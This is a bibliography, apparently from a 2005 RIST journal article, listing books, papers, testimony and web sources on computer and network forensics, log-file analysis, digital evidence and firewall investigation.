[1] The most dangerous place on earth in 2001 : A cyber ethnography Terry M. Gudaitis The Magazine on Information Impacts May 2001 [2] FC : Bruce schneier on computer security :Things are getting worse Bruce schneier July 16, 2001 Testimony and Statement for the United States Senate [3] Fingerprints, Broken WindowsCode everywhere David Britt July 2001 http://www.toplayer.com/content/cm/news66.jsp [4] Policies to Enhance Computer and Network Forensics Alec Yasinsac and Ynet Manzano Workshop on information assurance and security United states Military Academy West point, NY, 5-6 June, 2001 [5] When security fails By Paul Desmond Network World September 2000 [6] Network Forensics Christopher Patrick Murray University of Minnesota, Morris http://web.archive.org/web/20040215100928/http://mrs.umn.edu/~lopezdr/seminar/fall2000/ Murray.htm [7] Techniques for catching the perp: the basics of computer forensics By Don Walker May, 2001 Unisys World [8] About logging site activity http://iishelp.web.cern.ch/IISHelp/iis/htm/core/iiabtlg.htm [9] Lutilisation des log files en valuation et en reconception : intrts et limites Christian Bastien. 2001 http://www.lergonome.org/pages/detail_articles.php?indice=9
RIST Vol.15 N01-02 Anne 2005.

[10] Downloads, Logs and Captures : Evidence from cyberspace Peter Sommer Computer Security Research Center London School of Economics & Political Science http://www.giustizia.it/cassazione/convegni/dic2000/sommer_2.pdf

[11] Digital Evidence and Computer Crime: Forensic Science, Computers, and the Internet Eoghan Casey Edition Academic Press, January Janvier 2000 [12] La conception dune base dune base de connaissance pour laide linvestigation dans Firewall Forensics Bensefia Hassina Mmoire de post-graduation spcialise en scurit Informatique Mai 2002 Centre de Recheche sur lInformation Scientifique et technique Alger, Algrie [13] Forensics For Dummies Douglas. P. Lyle Edition Paperback 2004 [14] www.cert.org CERT Coordination Center

RIST Vol.15 N01-02 Anne 2005.